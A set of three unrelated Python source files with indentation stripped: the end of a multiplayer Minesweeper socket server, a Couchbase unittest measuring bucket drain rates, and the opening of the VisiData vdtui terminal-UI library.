minecoord.remove(clickcoord)
else:
status = 'MINE!'
if len(minecoord)== 0:
print('last mine')
print('game over')
Winner = max(playerScores.iteritems(), key=operator.itemgetter(1))[0] #Determine the winner by comparing scores
print('Player ' + Winner + ' won!')
status = 'Winner'
else:
score = score - 5 #Deduct points for clicking mine
else:
status = 'CLEAR' #Clear spot, there is no mine
if len(SendNeighbors) >= 1: #add a point to score if the click coordinates are next to a mine
score = score + 1
else:
score = score + 0
# ',' is used to reveal a button
elif ',' not in clickcoord:
flagcoord = clickcoord.replace(':',',')
print(flagcoord)
print(minecoord)
if any(x in flagcoord for x in minecoord):
minecoord.remove(str(flagcoord))
status = 'FlaggedMine'
score = score + 1
if len(minecoord)== 0:
print('last mine')
print('game over')
Winner = max(playerScores.iteritems(), key=operator.itemgetter(1))[0] #Determine the winner by comparing scores
print('Player ' + Winner + ' won!')
status = 'Winner'
else:
status = 'FlaggedCLEAR' #Clear spot, there is no mine
score = score + 0
sendScore = str(score)
if ':' not in clickcoord:
NumNeighbors = len(SendNeighbors)
NumNeighbors = str(NumNeighbors)
sock.send(str.encode(NumNeighbors))
else:
NumNeighbors = '0'
sock.send(str.encode(NumNeighbors))
sock.send(str.encode(sendScore))
sock.send(str.encode(status))
playerScores = scoreKeeper(playerNum, score) #Update player score
if data:
peerName = sock.getpeername()
scoreList = peerName, score
if data.decode() != "getmesome":
queuelock.acquire()
echo_queue.append(data.decode())
queuelock.release()
else:
queuelock.acquire()
data = echo_queue[0]
del echo_queue[0]
queuelock.release()
sock.send(b"Echoing: " + str.encode(data))
else:
print("Ending connection with: ", sock.getpeername())
sock.close()
break
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 2001))
sock.listen(5)
queuelock = threading.Lock()
while True:
scoreKeeper(playerNum, 0)
clientsock, addr = sock.accept()
playerNum += 1
Players.append(addr[1])
t = threading.Thread(target=clientecho, args=(clientsock, score, playerNum))
t.start()
|
drainratetests.py
|
from threading import Thread
import unittest
import time
from TestInput import TestInputSingleton
import logger
import datetime
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import MemcachedClientHelper
from security.rbac_base import RbacBase
class DrainRateTests(unittest.TestCase):
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self.assertTrue(self.input, msg="input parameters missing...")
self.master = self.input.servers[0]
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
self.bucket = "default"
self.number_of_items = -1
# Add built-in user
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin', self.master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list, RestConnection(self.master), 'builtin')
self._create_default_bucket()
self.drained_in_seconds = -1
self.drained = False
self.reader_shutdown = False
self._log_start()
def tearDown(self):
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
rest = RestConnection(self.master)
# Remove rbac user in teardown
role_del = ['cbadminbucket']
temp = RbacBase().remove_user_role(role_del, rest)
self._log_finish()
def _log_start(self):
try:
msg = "{0} : {1} started ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
def _log_finish(self):
try:
msg = "{0} : {1} finished ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
def _create_default_bucket(self, replica=1):
name = "default"
self.bucket_storage = self.input.param("bucket_storage", 'couchstore')
master = self.input.servers[0]
rest = RestConnection(master)
helper = RestHelper(RestConnection(master))
if not helper.bucket_exists(name):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.input.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * node_ram_ratio
if(available_ram < 256):
available_ram = 256
rest.create_bucket(bucket=name, ramQuotaMB=int(available_ram),
replicaNumber=replica,
storageBackend=self.bucket_storage)
ready = BucketOperationHelper.wait_for_memcached(master, name)
self.assertTrue(ready, msg="wait_for_memcached failed")
self.assertTrue(helper.bucket_exists(name),
msg="unable to create {0} bucket".format(name))
def _load_data_for_buckets(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
distribution = {128: 1.0}
self.bucket_data = {}
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
self.bucket_data[name] = {}
self.bucket_data[name]["inserted_keys"], self.bucket_data[name]["rejected_keys"] = \
MemcachedClientHelper.load_bucket_and_return_the_keys(name=self.bucket,
servers=[self.master],
value_size_distribution=distribution,
number_of_threads=1,
number_of_items=self.number_of_items,
write_only=True)
def _parallel_read(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
while not self.reader_shutdown:
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
mc = MemcachedClientHelper.direct_client(self.master, name)
for key in self.bucket_data[name]["inserted_keys"]:
mc.get(key)
def _monitor_drain_queue(self):
#start whenever drain_queue is > 0
rest = RestConnection(self.master)
start = time.time()
self.log.info("wait 2 seconds for bucket stats are up")
time.sleep(2)
stats = rest.get_bucket_stats(self.bucket)
self.log.info("current ep_queue_size: {0}".format(stats["ep_queue_size"]))
self.drained = RebalanceHelper.wait_for_persistence(self.master, self.bucket, timeout=300)
self.drained_in_seconds = time.time() - start
def _test_drain(self, parallel_read=False):
reader = None
loader = Thread(target=self._load_data_for_buckets)
loader.start()
self.log.info("waiting for loader thread to insert {0} items".format(self.number_of_items))
loader.join()
wait_for_queue = Thread(target=self._monitor_drain_queue)
wait_for_queue.start()
if parallel_read:
reader = Thread(target=self._parallel_read)
reader.start()
self.log.info("waiting for ep_queue == 0")
wait_for_queue.join()
self.log.info("took {0} seconds to drain {1} items".format(self.drained_in_seconds, self.number_of_items))
if parallel_read:
self.reader_shutdown = True
reader.join()
self.assertTrue(self.drained, "failed to drain all items")
def test_drain_10k_items_parallel_read(self):
self.number_of_items = 10 * 1000
self._test_drain(True)
def test_drain_10k_items(self):
self.number_of_items = 10 * 1000
self._test_drain()
def test_drain_100k_items(self):
self.number_of_items = 100 * 1000
self._test_drain()
def test_drain_100k_items_parallel_read(self):
self.number_of_items = 100 * 1000
self._test_drain(True)
def test_drain_1M_items(self):
self.number_of_items = 1 * 1000 * 1000
self._test_drain()
def test_drain_1M_items_parallel_read(self):
self.number_of_items = 1 * 1000 * 1000
self._test_drain(True)
|
vdtui.py
|
#!/usr/bin/env python3
#
# Copyright 2017 Saul Pwanson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import _curses
__version__ = 'saul.pw/vdtui v0.95.1'
__author__ = 'Saul Pwanson <vdtui@saul.pw>'
__license__ = 'MIT'
__status__ = 'Beta'
import collections
import copy
import curses
import datetime
import functools
import io
import itertools
import os
import os.path
import re
import string
import textwrap
import threading
import time
from builtins import *
class EscapeException(Exception):
pass
baseCommands = collections.OrderedDict()
baseOptions = collections.OrderedDict()
def command(keystrokes, execstr, helpstr):
if isinstance(keystrokes, str):
keystrokes = [keystrokes]
for ks in keystrokes:
baseCommands[ks] = (ks, helpstr, execstr)
def alias(new, existing):
_, helpstr, execstr = baseCommands[existing]
command(new, execstr, helpstr)
class configbool:
def __init__(self, v):
if isinstance(v, str):
self.val = v and (v[0] not in "0fFnN")
else:
self.val = bool(v)
def __bool__(self):
return self.val
def __str__(self):
return str(self.val)
def option(name, default, helpstr=''):
if isinstance(default, bool):
default = configbool(default)
baseOptions[name] = [name, default, default, helpstr] # see OptionsObject
theme = option
option('debug', False, 'abort on error and display stacktrace')
option('readonly', False, 'disable saving')
option('encoding', 'utf-8', 'as passed to codecs.open')
option('encoding_errors', 'surrogateescape', 'as passed to codecs.open')
option('field_joiner', ' ', 'character used to join string fields')
option('sheetname_joiner', '~', 'string joining multiple sheet names')
option('curses_timeout', 100, 'curses timeout in ms')
option('default_width', 20, 'default column width')
option('regex_flags', 'I', 'flags to pass to re.compile() [AILMSUX]')
option('num_colors', 0, 'force number of colors to use')
option('maxlen_col_hdr', 2, 'maximum length of column-header strings')
option('textwrap', True, 'if TextSheet breaks rows to fit in windowWidth')
option('force_valid_names', False, 'force column names to be valid Python identifiers')
theme('disp_truncator', '…')
theme('disp_key_sep', '/')
theme('disp_format_exc', '?')
theme('disp_getter_exc', '!')
theme('disp_edit_fill', '_', 'edit field fill character')
theme('disp_more_left', '<', 'display cue in header indicating more columns to the left')
theme('disp_more_right', '>', 'display cue in header indicating more columns to the right')
theme('disp_column_sep', '|', 'chars between columns')
theme('disp_keycol_sep', '\u2016', 'chars between keys and rest of columns')
theme('disp_error_val', '¿', 'displayed contents when getter fails due to exception')
theme('disp_none', '', 'visible contents of a cell whose value was None')
theme('color_current_row', 'reverse')
theme('color_default', 'normal')
theme('color_selected_row', '215 yellow')
theme('color_format_exc', '48 bold yellow')
theme('color_getter_exc', 'red bold')
theme('color_current_col', 'bold')
theme('color_current_hdr', 'reverse underline')
theme('color_key_col', '81 cyan')
theme('color_default_hdr', 'bold underline')
theme('color_column_sep', '246 blue')
theme('disp_status_sep', ' | ', 'string separating multiple statuses')
theme('disp_unprintable', '.', 'a substitute character for unprintables')
theme('disp_column_fill', ' ', 'pad chars after column value')
theme('disp_oddspace', '\u00b7', 'displayable character for odd whitespace')
theme('color_status', 'bold', 'status line color')
theme('color_edit_cell', 'normal', 'edit cell color')
theme('disp_status_fmt', '{sheet.name}| ', 'status line prefix')
theme('unicode_ambiguous_width', 1, 'width to use for unicode chars marked ambiguous')
ENTER = '^J'
ESC = '^['
command('q', 'vd.sheets.pop(0)', 'quit the current sheet')
command(['h', 'KEY_LEFT'], 'cursorRight(-1)', 'go one column left')
command(['j', 'KEY_DOWN'], 'cursorDown(+1)', 'go one row down')
command(['k', 'KEY_UP'], 'cursorDown(-1)', 'go one row up')
command(['l', 'KEY_RIGHT'], 'cursorRight(+1)', 'go one column right')
command(['^F', 'KEY_NPAGE', 'kDOWN'], 'cursorDown(nVisibleRows); sheet.topRowIndex += nVisibleRows',
'scroll one page down')
command(['^B', 'KEY_PPAGE', 'kUP'], 'cursorDown(-nVisibleRows); sheet.topRowIndex -= nVisibleRows',
'scroll one page up')
#command('gq', 'vd.sheets.clear()', 'drop all sheets (clean exit)')
command('gh', 'sheet.cursorVisibleColIndex = sheet.leftVisibleColIndex = nKeys', 'go to leftmost non-key column')
command('gk', 'sheet.cursorRowIndex = sheet.topRowIndex = 0', 'go to top row')
command('gj', 'sheet.cursorRowIndex = len(rows); sheet.topRowIndex = cursorRowIndex-nVisibleRows', 'go to bottom row')
command('gl', 'sheet.cursorVisibleColIndex = len(visibleCols)-1', 'go to rightmost column')
alias('gg', 'gk')
alias('G', 'gj')
alias('KEY_HOME', 'gk')
alias('KEY_END', 'gj')
command('^L', 'vd.scr.clear()', 'redraw entire terminal screen')
command('^G', 'status(statusLine)', 'show info for the current sheet')
#command('^V', 'status(__version__)', 'show version information')
command('<',
'moveToNextRow(lambda row,sheet=sheet,col=cursorCol,val=cursorValue: col.getValue(row) != val, reverse=True) or status("no different value up this column")',
'move up to previous value in this column')
command('>',
'moveToNextRow(lambda row,sheet=sheet,col=cursorCol,val=cursorValue: col.getValue(row) != val) or status("no different value down this column")',
'move down to next value in this column')
command('{',
'moveToNextRow(lambda row,sheet=sheet: sheet.isSelected(row), reverse=True) or status("no previous selected row")',
'move to previous selected row')
command('}', 'moveToNextRow(lambda row,sheet=sheet: sheet.isSelected(row)) or status("no next selected row")',
'move to next selected row')
#command('_', 'cursorCol.toggleWidth(cursorCol.getMaxWidth(visibleRows))',
# 'toggle this column width between default_width and to fit visible values')
command('-', 'cursorCol.width = 0', 'hide this column')
#command('g_', 'for c in visibleCols: c.width = c.getMaxWidth(visibleRows)',
# 'set width of all columns to fit visible cells')
command('[', 'rows.sort(key = lambda x, col= cursorColIndex: x[col])', 'sort by this column ascending')
command(']', 'rows.sort(key = lambda x, col= cursorColIndex: x[col], reverse=True)', 'sort by this column descending')
#command('^D', 'options.debug = not options.debug; status("debug " + ("ON" if options.debug else "OFF"))',
# 'toggle debug mode')
#command('^E', 'vd.lastErrors and vd.push(TextSheet("last_error", vd.lastErrors[-1])) or status("no error")',
# 'open stack trace for most recent error')
#command('^^', 'vd.sheets[0], vd.sheets[1] = vd.sheets[1], vd.sheets[0]', 'jump to previous sheet')
#command('g^E', 'vd.push(TextSheet("last_errors", "\\n\\n".join(vd.lastErrors)))', 'open most recent errors')
#command('^R', 'reload(); recalc(); status("reloaded")', 'reload sheet from source')
command('/', 'moveRegex(regex=input("/", type="regex"), columns="cursorCol", backward=False)',
'search this column forward for regex')
command('?', 'moveRegex(regex=input("?", type="regex"), columns="cursorCol", backward=True)',
'search this column backward for regex')
command('n', 'moveRegex(reverse=False)', 'go to next match')
command('p', 'moveRegex(reverse=True)', 'go to previous match')
command('g/', 'moveRegex(regex=input("g/", type="regex"), backward=False, columns="visibleCols")',
'search regex forward in all visible columns')
command('g?', 'moveRegex(regex=input("g?", type="regex"), backward=True, columns="visibleCols")',
'search regex backward in all visible columns')
#command('e', 'cursorCol.setValues([cursorRow], editCell(cursorVisibleColIndex)); sheet.cursorRowIndex += 1',
# 'edit this cell')
#command('ge', 'cursorCol.setValues(selectedRows, input("set selected to: ", value=cursorValue))',
# 'edit this column for all selected rows')
#command('d', 'rows.pop(cursorRowIndex)', 'delete this row')
#command('gd', 'deleteSelected()', 'delete all selected rows')
command(' ', 'toggle([cursorRow]); cursorDown(1)', 'toggle select of this row')
command('s', 'select([cursorRow]); cursorDown(1)', 'select this row')
command('u', 'unselect([cursorRow]); cursorDown(1)', 'unselect this row')
#command('|', 'selectByIdx(searchRegex(regex=input("|", type="regex"), columns="cursorCol"))',
# 'select rows by regex matching this columns')
#command('\\', 'unselectByIdx(searchRegex(regex=input("\\\\", type="regex"), columns="cursorCol"))',
# 'unselect rows by regex matching this columns')
#command('g ', 'toggle(rows)', 'toggle select of all rows')
#command('gs', 'select(rows)', 'select all rows')
command('gu', '_selectedRows.clear()', 'unselect all rows')
#command('g|', 'selectByIdx(searchRegex(regex=input("g|", type="regex"), columns="visibleCols"))',
# 'select rows by regex matching any visible column')
#command('g\\', 'unselectByIdx(searchRegex(regex=input("g\\\\", type="regex"), columns="visibleCols"))',
# 'unselect rows by regex matching any visible column')
#command(',', 'select(gatherBy(lambda r,c=cursorCol,v=cursorValue: c.getValue(r) == v), progress=False)',
# 'select rows matching by this column')
#command('g,', 'select(gatherBy(lambda r,v=cursorRow: r == v), progress=False)', 'select all rows that match this row')
#command('"', 'vd.push(sheet.copy("_selected")).rows = list(sheet.selectedRows)',
# 'push duplicate sheet with only selected rows')
#command('g"', 'vd.push(sheet.copy())', 'push duplicate sheet')
#command('V', 'vd.push(TextSheet("%s[%s].%s" % (name, cursorRowIndex, cursorCol.name), cursorValue))',
# 'view readonly contents of this cell in a new sheet')
#command('`', 'vd.push(source if isinstance(source, Sheet) else None)', 'push source sheet')
#command('S', 'vd.push(SheetsSheet())', 'open Sheet stack')
#command('C', 'vd.push(ColumnsSheet(sheet))', 'open Columns for this sheet')
#command('O', 'vd.push(vd.optionsSheet)', 'open Options for this sheet')
command('z?', 'vd.push(HelpSheet(name + "_commands", sheet))', 'open command help sheet')
alias('KEY_F(1)', 'z?')
# VisiData uses Python native int, float, str, and adds simple date, currency, and anytype.
#
# A type T is used internally in these ways:
# o = T(str) # for conversion from string
# o = T() # for default value to be used when conversion fails
#
# The resulting object o must be orderable and convertible to a string for display and certain outputs (like csv).
## minimalist 'any' type
def anytype(r=''):
return str(r)
anytype.__name__ = ''
option('float_chars', '+-0123456789.eE_', 'valid numeric characters')
def currency(s):
'a `float` with any leading and trailing non-numeric characters stripped'
floatchars = options.float_chars
if isinstance(s, str):
while s[0] not in floatchars:
s = s[1:]
while s[-1] not in floatchars:
s = s[:-1]
return float(s)
class date:
'`datetime` wrapper, constructing from time_t or from str with dateutil.parse'
def __init__(self, s=None):
if s is None:
self.dt = datetime.datetime.now()
elif isinstance(s, int) or isinstance(s, float):
self.dt = datetime.datetime.fromtimestamp(s)
elif isinstance(s, str):
import dateutil.parser
self.dt = dateutil.parser.parse(s)
else:
assert isinstance(s, datetime.datetime)
self.dt = s
def to_string(self, fmtstr=None):
'Convert datetime object to string, in ISO 8601 format by default.'
if not fmtstr:
fmtstr = '%Y-%m-%d %H:%M:%S'
return self.dt.strftime(fmtstr)
def __getattr__(self, k):
'Forward unknown attributes to inner datetime object'
return getattr(self.dt, k)
def __str__(self):
return self.to_string()
def __lt__(self, a):
return self.dt < a.dt
typemap = {
str: '~',
date: '@',
int: '#',
currency: '$',
float: '%',
anytype: ' ',
}
def joinSheetnames(*sheetnames):
'Concatenate sheet names using `options.sheetname_joiner`.'
return options.sheetname_joiner.join(str(x) for x in sheetnames)
def error(s):
'Return custom exception as function, for use with `lambda` and `eval`.'
raise Exception(s)
def status(*args):
'Return status property via function call.'
return vd().status(*args)
def moveListItem(L, fromidx, toidx):
"Move element within list `L` and return element's new index."
r = L.pop(fromidx)
L.insert(toidx, r)
return toidx
def enumPivot(L, pivotIdx):
'''Model Python `enumerate()` but starting midway through sequence `L`.
Begin at index following `pivotIdx`, traverse through end.
At sequence-end, begin at sequence-head, continuing through `pivotIdx`.'''
rng = range(pivotIdx + 1, len(L))
rng2 = range(0, pivotIdx + 1)
for i in itertools.chain(rng, rng2):
yield i, L[i]
# VisiData singleton contains all sheets
@functools.lru_cache()
def vd():
'''Instantiate and return singleton instance of VisiData class.
Contains all sheets, and (as singleton) is unique instance..'''
return VisiData()
def exceptionCaught(status=True):
return vd().exceptionCaught(status)
def chooseOne(choices):
'''Return `input` statement choices formatted with `/` as separator.
Choices can be list/tuple or dict (if dict, its keys will be used).'''
if isinstance(choices, dict):
return choices[input('/'.join(choices.keys()) + ': ')]
else:
return input('/'.join(str(x) for x in choices) + ': ')
def regex_flags():
'Return flags to pass to regex functions from options'
return sum(getattr(re, f.upper()) for f in options.regex_flags)
def sync():
'Wait for all async threads to finish.'
while len(vd().unfinishedThreads) > 0:
vd().checkForFinishedThreads()
def async(func):
'Function decorator, to make calls to `func()` spawn a separate thread if available.'
def _execAsync(*args, **kwargs):
return vd().execAsync(func, *args, **kwargs)
return _execAsync
class VisiData:
allPrefixes = 'gz' # 'g'lobal, 'z'scroll
def __init__(self):
self.sheets = []
self.statuses = [] # statuses shown until next action
self.lastErrors = []
self.searchContext = {}
self.statusHistory = []
self.lastInputs = collections.defaultdict(collections.OrderedDict) # [input_type] -> prevInputs
self.keystrokes = ''
self.inInput = False
self.scr = None # curses scr
self.hooks = {}
self.threads = [] # all threads, including finished
def status(self, *args):
'Add status message to be shown until next action.'
s = '; '.join(str(x) for x in args)
self.statuses.append(s)
self.statusHistory.insert(0, s)
return s
def addHook(self, hookname, hookfunc):
'Add hookfunc by hookname, to be called by corresponding `callHook`.'
if hookname in self.hooks:
hooklist = self.hooks[hookname]
else:
hooklist = []
self.hooks[hookname] = hooklist
hooklist.append(hookfunc)
def callHook(self, hookname, *args, **kwargs):
'Call all functions registered with `addHook` for the given hookname.'
r = None
for f in self.hooks.get(hookname, []):
r = r or f(*args, **kwargs)
return r
def execAsync(self, func, *args, **kwargs):
'Execute `func(*args, **kwargs)`, possibly in a separate thread.'
if threading.current_thread().daemon:
# Don't spawn a new thread from a subthread.
return func(*args, **kwargs)
currentSheet = self.sheets[0]
if currentSheet.currentThread:
confirm('replace task %s already in progress? ' % currentSheet.currentThread.name)
thread = threading.Thread(target=self.toplevelTryFunc, daemon=True, args=(func,) + args, kwargs=kwargs)
self.threads.append(thread)
currentSheet.currentThread = thread
thread.sheet = currentSheet
thread.start()
return thread
def toplevelTryFunc(self, func, *args, **kwargs):
'Thread entry-point for `func(*args, **kwargs)` with try/except wrapper'
t = threading.current_thread()
t.name = func.__name__
t.startTime = time.process_time()
t.endTime = None
t.status = ''
ret = None
try:
ret = func(*args, **kwargs)
except EscapeException as e: # user aborted
t.status += 'aborted by user'
self.status('%s aborted' % t.name)
except Exception as e:
t.status += self.status('%s: %s' % (type(e).__name__, ' '.join(str(x) for x in e.args)))
exceptionCaught()
t.sheet.currentThread = None
t.sheet.progressMade = t.sheet.progressTotal
return ret
@property
def unfinishedThreads(self):
'A list of unfinished threads (those without a recorded `endTime`).'
return [t for t in self.threads if t.endTime is None]
def checkForFinishedThreads(self):
'Mark terminated threads with endTime.'
for t in self.unfinishedThreads:
if not t.is_alive():
t.endTime = time.process_time()
t.status += 'ended'
def editText(self, y, x, w, **kwargs):
'Wrap global editText with `preedit` and `postedit` hooks.'
v = self.callHook('preedit')
if v is not None:
return v
cursorEnable(True)
v = editText(self.scr, y, x, w, **kwargs)
cursorEnable(False)
if kwargs.get('display', True):
self.status('"%s"' % v)
self.callHook('postedit', v)
return v
def getkeystroke(self, scr, vs=None):
'Get keystroke and display it on status bar.'
k = None
try:
k = scr.get_wch()
self.drawRightStatus(scr, vs or self.sheets[0]) # continue to display progress %
except Exception:
return '' # curses timeout
if isinstance(k, str):
if ord(k) >= 32 and ord(k) != 127: # 127 == DEL or ^?
return k
k = ord(k)
return curses.keyname(k).decode('utf-8')
# kwargs: regex=None, columns=None, backward=False
def searchRegex(self, sheet, moveCursor=False, reverse=False, **kwargs):
'Set row index if moveCursor, otherwise return list of row indexes.'
def findMatchingColumn(sheet, row, columns, func):
for c in columns:
if func(c.getDisplayValue(row)):
return c
self.searchContext.update(kwargs)
regex = kwargs.get("regex")
if regex:
self.searchContext["regex"] = re.compile(regex, regex_flags()) or error('invalid regex: %s' % regex)
regex = self.searchContext.get("regex") or error("no regex")
columns = self.searchContext.get("columns")
if columns == "cursorCol":
columns = [sheet.cursorCol]
elif columns == "visibleCols":
columns = tuple(sheet.visibleCols)
elif isinstance(columns, Column):
columns = [columns]
if not columns:
error('bad columns')
searchBackward = self.searchContext.get("backward")
if reverse:
searchBackward = not searchBackward
if searchBackward:
rng = range(sheet.cursorRowIndex - 1, -1, -1)
rng2 = range(sheet.nRows - 1, sheet.cursorRowIndex - 1, -1)
else:
rng = range(sheet.cursorRowIndex + 1, sheet.nRows)
rng2 = range(0, sheet.cursorRowIndex + 1)
matchingRowIndexes = 0
sheet.progressTotal = sheet.nRows
sheet.progressMade = 0
for r in itertools.chain(rng, rng2):
sheet.progressMade += 1
c = findMatchingColumn(sheet, sheet.rows[r], columns, regex.search)
if c:
if moveCursor:
sheet.cursorRowIndex = r
sheet.cursorVisibleColIndex = sheet.visibleCols.index(c)
if r in rng2:
status('search wrapped')
return
else:
matchingRowIndexes += 1
yield r
status('%s matches for /%s/' % (matchingRowIndexes, regex.pattern))
def exceptionCaught(self, status=True):
'Maintain list of most recent errors and return most recent one.'
import traceback
self.lastErrors.append(traceback.format_exc().strip())
self.lastErrors = self.lastErrors[-10:] # keep most recent
if status:
return self.status(self.lastErrors[-1].splitlines()[-1])
if options.debug:
raise Exception
def drawLeftStatus(self, scr, vs):
'Draw left side of status bar.'
try:
lstatus = self.leftStatus(vs)
attr = colors[options.color_status]
_clipdraw(scr, self.windowHeight - 1, 0, lstatus, attr, self.windowWidth)
except Exception as e:
self.exceptionCaught()
def drawRightStatus(self, scr, vs):
'Draw right side of status bar.'
try:
rstatus, attr = self.rightStatus(vs)
_clipdraw(scr, self.windowHeight - 1, self.windowWidth - len(rstatus) - 2, rstatus, attr, len(rstatus))
curses.doupdate()
except Exception as e:
self.exceptionCaught()
def leftStatus(self, vs):
'Compose left side of status bar and add status messages.'
s = vs.leftStatus()
s += options.disp_status_sep.join(self.statuses)
return s
def rightStatus(self, sheet):
'Compose right side of status bar.'
status = '%s %9d,%d' % (self.keystrokes, sheet.cursorRowIndex + 1, sheet.cursorVisibleColIndex + 1)
attr = colors[options.color_status]
return status, attr
@property
def windowHeight(self):
return self.scr.getmaxyx()[0] if self.scr else 25
@property
def windowWidth(self):
return self.scr.getmaxyx()[1] if self.scr else 80
def run(self, scr):
'Manage execution of keystrokes and subsequent redrawing of screen.'
global sheet
scr.timeout(int(options.curses_timeout))
cursorEnable(False)
self.scr = scr
self.keystrokes = ''
while True:
if not self.sheets:
# if no more sheets, exit
return
sheet = self.sheets[0]
try:
sheet.draw(scr)
except Exception as e:
self.exceptionCaught()
self.drawLeftStatus(scr, sheet)
self.drawRightStatus(scr, sheet) # visible during this getkeystroke
keystroke = self.getkeystroke(scr, sheet)
if keystroke:
if self.keystrokes not in self.allPrefixes:
self.keystrokes = ''
self.statuses = []
self.keystrokes += keystroke
self.drawRightStatus(scr, sheet) # visible for commands that wait for input
if not keystroke: # timeout instead of keypress
pass
elif keystroke == '^Q':
return self.lastErrors and self.lastErrors[-1]
elif keystroke == 'KEY_RESIZE':
pass
elif keystroke == 'KEY_MOUSE':
try:
devid, x, y, z, bstate = curses.getmouse()
sheet.cursorRowIndex = sheet.topRowIndex + y - 1
except curses.error:
pass
elif self.keystrokes in sheet.commands:
sheet.exec_command(globals(), sheet.commands[self.keystrokes])
elif keystroke in self.allPrefixes:
pass
else:
status('no command for "%s"' % (self.keystrokes))
self.checkForFinishedThreads()
self.callHook('predraw')
sheet.checkCursor()
def replace(self, vs):
'Replace top sheet with the given sheet `vs`.'
self.sheets.pop(0)
return self.push(vs)
def remove(self, vs):
if vs in self.sheets:
self.sheets.remove(vs)
else:
error('sheet not on stack')
def push(self, vs):
'Move given sheet `vs` to index 0 of list `sheets`.'
if vs:
vs.vd = self
if vs in self.sheets:
self.sheets.remove(vs)
self.sheets.insert(0, vs)
elif len(vs.rows) == 0: # first time
self.sheets.insert(0, vs)
vs.reload()
else:
self.sheets.insert(0, vs)
return vs
# end VisiData class
class LazyMap:
'A lazily evaluated mapping'
def __init__(self, keys, getter, setter):
self._keys = keys
self._getter = getter
self._setter = setter
def keys(self):
return self._keys
def __getitem__(self, k):
if k not in self._keys:
raise KeyError(k)
return self._getter(k)
def __setitem__(self, k, v):
self._keys.append(k)
self._setter(k, v)
class Sheet:
'Base object for add-on inheritance.'
def __init__(self, name, *sources, columns=None):
self.name = name
self.sources = list(sources)
self.rows = [] # list of opaque row objects
self.cursorRowIndex = 0 # absolute index of cursor into self.rows
self.cursorVisibleColIndex = 0 # index of cursor into self.visibleCols
self.topRowIndex = 0 # cursorRowIndex of topmost row
self.leftVisibleColIndex = 0 # cursorVisibleColIndex of leftmost column
self.rightVisibleColIndex = 0
self.loader = None
# as computed during draw()
self.rowLayout = {} # [rowidx] -> y
self.visibleColLayout = {} # [vcolidx] -> (x, w)
# all columns in display order
self.columns = columns or [] # list of Column objects
self.nKeys = 0 # self.columns[:nKeys] are all pinned to the left and matched on join
# commands specific to this sheet
self.commands = collections.ChainMap(collections.OrderedDict(), baseCommands)
self._selectedRows = {} # id(row) -> row
# for progress bar
self.progressMade = 0
self.progressTotal = 0
# only allow one async task per sheet
self.currentThread = None
self.colorizers = {'row': [], 'col': [], 'hdr': [], 'cell': []}
self.addColorizer('hdr', 0, lambda s, c, r, v: options.color_default_hdr)
self.addColorizer('hdr', 9, lambda s, c, r, v: options.color_current_hdr if c is s.cursorCol else None)
self.addColorizer('hdr', 8, lambda s, c, r, v: options.color_key_col if c in s.keyCols else None)
self.addColorizer('col', 5, lambda s, c, r, v: options.color_current_col if c is s.cursorCol else None)
self.addColorizer('col', 7, lambda s, c, r, v: options.color_key_col if c in s.keyCols else None)
self.addColorizer('cell', 2, lambda s, c, r, v: options.color_default)
self.addColorizer('row', 8, lambda s, c, r, v: options.color_selected_row if s.isSelected(r) else None)
self.addColorizer('row', 10, lambda s, c, r, v: options.color_current_row if r is s.cursorRow else None)
def addColorizer(self, colorizerType, precedence, colorfunc):
self.colorizers[colorizerType].append((precedence, colorfunc))
def colorizeRow(self, row):
return self.colorize(['row'], None, row)
def colorizeColumn(self, col):
return self.colorize(['col'], col, None)
def colorizeHdr(self, col):
return self.colorize(['hdr'], col, None)
def colorizeCell(self, col, row, value):
return self.colorize(['col', 'row', 'cell'], col, row, value)
def colorize(self, colorizerTypes, col, row, value=None):
'Returns curses attribute for the given col/row/value'
attr = 0
attrpre = 0
for colorizerType in colorizerTypes:
for precedence, func in sorted(self.colorizers[colorizerType], key=lambda x: x[0]):
color = func(self, col, row, value)
if color:
attr, attrpre = colors.update(attr, attrpre, color, precedence)
return attr
def leftStatus(self):
'Compose left side of status bar for this sheet (overridable).'
return options.disp_status_fmt.format(sheet=self)
def genProgress(self, L, total=None):
'Create generator (for for-loops), with `progressTotal` property.'
self.progressTotal = total or len(L)
self.progressMade = 0
for i in L:
self.progressMade += 1
yield i
self.progressMade = self.progressTotal
def command(self, keystrokes, execstr, helpstr):
'Populate command, help-string and execution string for keystrokes.'
if isinstance(keystrokes, str):
keystrokes = [keystrokes]
for ks in keystrokes:
